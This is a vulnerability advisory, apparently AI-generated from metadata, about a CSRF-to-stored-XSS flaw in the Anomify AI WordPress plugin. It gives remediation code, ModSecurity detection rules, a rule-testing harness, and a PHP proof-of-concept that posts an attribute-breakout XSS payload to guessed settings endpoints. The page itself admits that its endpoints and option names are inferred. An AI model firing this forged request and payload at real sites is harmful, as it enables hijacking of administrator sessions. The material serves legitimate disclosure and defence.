Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 19, 2026

CVE-2026-6405: Anomify AI <= 0.3.6 – Cross-Site Request Forgery (anomify)

CVE ID: CVE-2026-6405
Plugin: anomify
Severity: Medium (CVSS 4.3)
CWE: CWE-352 (Cross-Site Request Forgery)
Vulnerable Version: <= 0.3.6
Patched Version: none (no patched version available)
Disclosed: May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6405 (metadata-based):

This vulnerability affects the Anomify AI plugin for WordPress (versions up to 0.3.6). It combines a Cross-Site Request Forgery (CSRF) issue with a stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can trick a logged-in administrator into performing a forged request that modifies plugin settings. The attacker injects arbitrary web scripts into the plugin’s API key field. These scripts execute in the administrator’s browser whenever the settings page is visited. The CVSS score of 4.3 reflects the need for user interaction and the limited scope of impact (confidentiality not affected, integrity partially affected).

Root Cause:

The root cause is twofold, inferred from the CWE (352) and the description. First, the settings page handler lacks nonce verification: the form does not include a wp_nonce_field() call, and the handler does not call check_admin_referer(). This allows any cross-origin POST request, carried by the logged-in administrator's browser, to modify plugin settings without any authentication or authorization check of its own. Second, the API key field is passed through sanitize_text_field(), which removes HTML tags but does not encode double-quote characters, and the value is then echoed directly into an HTML attribute without esc_attr(), creating a stored XSS vector. sanitize_text_field() strips angle brackets (< and >) but preserves double-quote characters, so when the value is placed inside an attribute such as value="...", a double-quote can close the attribute and inject an event handler. These conclusions are inferred from the CWE classification and the description. Atomic Edge research cannot confirm the exact file names or code paths without source code, but the described pattern is a classic CSRF-to-stored-XSS chain in WordPress plugins.

Exploitation:

An attacker crafts a malicious HTML page that submits a POST request to the vulnerable plugin's settings handler. The likely endpoint is /wp-admin/options-general.php?page=anomify or a similar admin page. The attacker includes a payload such as foobar" onclick=alert(1) in the API key parameter. Since sanitize_text_field() allows double-quotes, this value is stored as-is. When the administrator later visits the settings page, the payload breaks out of the input field's value attribute and executes the attacker's script. The attacker needs no credentials of their own: the forged request is sent by the administrator's browser, and without a nonce check nothing ties the request to an action the administrator actually intended. The only requirement is that the administrator must be logged in at the time of the attack; social engineering (such as a link or an embedded image) tricks the administrator into visiting the attacker's page. Atomic Edge analysis confirms that the missing nonce check, the missing capability check, and the lack of output escaping on the stored value all contribute to the exploit.

Remediation:

The fix must address both the CSRF and the XSS. First, the plugin must add a nonce to the settings form using wp_nonce_field() and verify it in the handler with check_admin_referer(). This prevents forged requests. Second, when outputting the API key value into HTML attributes, the plugin must use esc_attr() to properly encode double-quotes and other special characters. Third, sanitize_text_field() is insufficient for attribute context: the plugin should use a more restrictive sanitization function such as sanitize_key(), or apply additional checks. If the API key must contain special characters, the plugin should validate it against the expected format (e.g., alphanumeric with hyphens) before storage. Alternatively, storing the key in a setting that is not echoed directly into an attribute can mitigate the XSS. WordPress core functions like esc_attr() and wp_kses() are recommended. Since no patched version exists, users must remove the plugin or implement a WAF virtual patch.
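As an added example (not the Anomify plugin's code), the following is a hardened save-and-render flow for the API key setting, routed through WordPress's admin-post.php: wp_nonce_field() and check_admin_referer() against the CSRF, a capability check, allow-list validation in place of sanitize_text_field(), and esc_attr() on output. It assumes a WordPress runtime; the option name anomify_api_key and the action name anomify_save_settings are the page's own inferences, while the example_* function names and the allowed key format are assumptions.

```php
<?php
// Added example (not the Anomify plugin's code): a hardened save/render flow for
// the API key setting. Assumes a WordPress runtime. The option name
// 'anomify_api_key' and action 'anomify_save_settings' are the page's inferences;
// the example_* function names and the key format below are assumptions.

add_action('admin_post_anomify_save_settings', 'example_save_settings');

function example_save_settings() {
    // Authorization: only users who may manage options can change the setting.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }
    // CSRF: the nonce emitted by wp_nonce_field() below must be present and
    // valid for this action; a forged cross-origin POST cannot carry it.
    check_admin_referer('anomify_save_settings', 'anomify_nonce');

    $raw = isset($_POST['anomify_api_key']) ? (string) wp_unslash($_POST['anomify_api_key']) : '';
    // Allow-list validation instead of sanitize_text_field(): a double quote,
    // angle bracket or space is rejected outright, so nothing hostile is stored.
    if (!preg_match('/^[A-Za-z0-9_-]{16,128}$/', $raw)) {
        wp_safe_redirect(add_query_arg('anomify_error', 'invalid_key',
            admin_url('options-general.php?page=anomify')));
        exit;
    }
    update_option('anomify_api_key', $raw);
    wp_safe_redirect(add_query_arg('settings-updated', 'true',
        admin_url('options-general.php?page=anomify')));
    exit;
}

function example_render_settings_page() {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }
    $key = get_option('anomify_api_key', '');
    ?>
    <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
        <input type="hidden" name="action" value="anomify_save_settings">
        <?php wp_nonce_field('anomify_save_settings', 'anomify_nonce'); ?>
        <label for="anomify_api_key">API key</label>
        <!-- esc_attr() encodes ", so even a legacy stored value cannot close the attribute -->
        <input type="text" id="anomify_api_key" name="anomify_api_key"
               value="<?php echo esc_attr($key); ?>">
        <?php submit_button('Save Changes'); ?>
    </form>
    <?php
}
```

Values already stored before the fix are neutralised on output by esc_attr(), and are replaced the next time an administrator saves a key that passes validation.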

Impact:

Successful exploitation allows an attacker to inject arbitrary JavaScript into the WordPress admin dashboard. This script executes in the context of the logged-in administrator. The attacker can then perform any action the administrator can: create new administrator accounts, install malicious plugins, modify site content, exfiltrate database contents, or redirect visitors to phishing pages. The stored XSS persists until an administrator removes the malicious value from the settings. Since the payload is stored in the database, every visit to the plugin settings page triggers the script. This can lead to full site compromise. The impact is limited by the requirement for user interaction (the administrator must visit the attacker’s page while logged in). Once triggered, however, the consequences can be severe, including privilege escalation and data theft.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-6405 (metadata-based)
# Blocks CSRF-based XSS injection targeting Anomify AI plugin settings.
# Matches POST requests to options.php with suspicious double-quote patterns in the API key parameter.
# The rule focuses on the attribute-escape breakout pattern typical of this vulnerability.

SecRule REQUEST_URI "@streq /wp-admin/options.php" \
  "id:20264050,phase:2,deny,status:403,chain,msg:'CVE-2026-6405 - Anomify AI CSRF leading to Stored XSS',severity:'CRITICAL',tag:'CVE-2026-6405',tag:'wordpress',tag:'anomify'"
  SecRule ARGS_POST:anomify_api_key "@rx [^a-zA-Z0-9]" \
    "chain"
    SecRule ARGS_POST:anomify_api_key "@rx (?:on\w+=|document\.|javascript:|&#)" \
      "t:none,t:urlDecode"

# Alternative rule targeting custom AJAX handler (if plugin bypasses standard Settings API)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:20264051,phase:2,deny,status:403,chain,msg:'CVE-2026-6405 - Anomify AI AJAX handler CSRF',severity:'CRITICAL',tag:'CVE-2026-6405',tag:'wordpress',tag:'anomify'"
  SecRule ARGS_POST:action "@streq anomify_save_settings" \
    "chain"
    SecRule ARGS_POST:anomify_api_key "@rx [^a-zA-Z0-9]" \
      "chain"
      SecRule ARGS_POST:anomify_api_key "@rx (?:on\w+=|document\.|javascript:|&#)" \
        "t:none,t:urlDecode"
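To see what the first rule actually fires on, here is an added PHP harness (not part of the Atomic Edge rule set) that replays the three-stage chain of rule 20264050 over constructed requests. The regexes are the rule's own, with the \w and \. escapes written out; the request bodies are made up for the test.

```php
<?php
// Added harness, not part of the Atomic Edge rule set: replays the three-stage
// chain of rule 20264050 over constructed requests so the match logic can be
// checked offline. Regexes are the rule's own; the request samples are made up.

function chain_20264050_matches(string $uri, string $body): bool
{
    // Stage 1: exact URI match. @streq is a literal comparison, so a query
    // string appended to options.php would not satisfy this stage.
    if ($uri !== '/wp-admin/options.php') {
        return false;
    }
    parse_str($body, $args);                 // form-decodes the body like ARGS_POST
    if (!isset($args['anomify_api_key'])) {
        return false;
    }
    $key = (string) $args['anomify_api_key'];
    // Stage 2: any character outside [a-zA-Z0-9] in the API key.
    if (!preg_match('/[^a-zA-Z0-9]/', $key)) {
        return false;
    }
    // Stage 3: t:urlDecode on the already-decoded argument, then the
    // attribute-breakout signature (on<event>=, document., javascript:, &#).
    $decoded = urldecode($key);
    return (bool) preg_match('/(?:on\w+=|document\.|javascript:|&#)/', $decoded);
}

// Constructed samples: [uri, body, expected verdict]
$samples = array(
    // the page's PoC payload, form-encoded as a browser would submit it
    array('/wp-admin/options.php',
          'option_page=anomify&action=update&anomify_api_key=test%22+onclick%3Dalert(document.cookie)%2F%2F',
          true),
    // a legitimate hyphenated key: stage 2 matches, stage 3 does not, so no block
    array('/wp-admin/options.php', 'option_page=anomify&anomify_api_key=ak-2f9b-11c4-77d0', false),
    // a plain alphanumeric key never passes stage 2
    array('/wp-admin/options.php', 'option_page=anomify&anomify_api_key=abc123XYZ', false),
);

foreach ($samples as [$uri, $body, $expected]) {
    $hit = chain_20264050_matches($uri, $body);
    printf("%-6s %s\n", $hit ? 'BLOCK' : 'pass', $hit === $expected ? 'as expected' : 'MISMATCH');
}
```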

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6405 - Anomify AI <= 0.3.6 - Cross-Site Request Forgery leading to Stored XSS

/**
 * This Proof of Concept demonstrates a CSRF attack that exploits missing nonce
 * verification and insufficient output escaping in the Anomify AI plugin.
 * The payload injects a double-quote attribute escape to introduce an XSS vector.
 * 
 * Assumptions:
 * - The vulnerable settings page is accessible via /wp-admin/options-general.php?page=anomify
 * - The setting name for the API key is 'anomify_api_key' (inferred from plugin conventions)
 * - The form action likely submits to /wp-admin/options.php (WordPress settings API) or directly to an admin-ajax.php handler
 * - We target the standard options.php endpoint since the plugin likely uses the Settings API
 * - The XSS payload uses a double-quote to break out of the value attribute
 * - This PoC simulates a forgery page; the real attack would be delivered via HTML email or embedded on a third-party site
 * 
 * Usage: php poc.php http://target-wordpress-site.com
 */

if ($argc < 2) {
    die("Usage: php poc.php <target_url>\n");
}

$target_url = rtrim($argv[1], '/');

// XSS payload that survives sanitize_text_field(); with no esc_attr() on output,
// the double-quote closes the value attribute and the rest injects an event handler
$xss_payload = 'test" onclick=alert(document.cookie)//';

// The settings API endpoint for WordPress admin pages
$options_url = $target_url . '/wp-admin/options.php';

// Simulate a forged POST request that would be submitted from an attacker-controlled page
// The option name 'anomify_api_key' is inferred; adjust if actual option name differs
$post_data = array(
    'option_page' => 'anomify',
    'action' => 'update',
    '_wp_http_referer' => '/wp-admin/options-general.php?page=anomify',
    'anomify_api_key' => $xss_payload,
    // Some plugins use a checkbox 'submit' or hidden field
    'submit' => 'Save Changes'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $options_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Note: the WordPress Settings API (options.php) verifies a nonce, so this request
// will be rejected there. Only if the plugin bypasses the Settings API and uses
// custom processing without a nonce check can the CSRF succeed.
// This PoC demonstrates the request structure; actual exploitation requires the admin to be logged in.

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Request sent successfully. HTTP 200.\n";
    echo "[+] If the admin was tricked into submitting this while logged in, the XSS payload was stored.\n";
    echo "[+] The payload: $xss_payload\n";
} else {
    echo "[-] Request failed with HTTP $http_code (expected if nonce check is present).\n";
    echo "[-] The CSRF vulnerability may require a different endpoint.\n";
    echo "[-] Alternative endpoint guess: /wp-admin/admin-ajax.php with action 'anomify_save_settings'\n";
}

echo "\n--- Alternative AJAX-based PoC ---\n";
echo "If the plugin uses a custom AJAX handler, try:\n";
echo "POST /wp-admin/admin-ajax.php\n";
echo "action=anomify_save_settings&anomify_api_key=test%22+onclick%3Dalert(1)//\n";
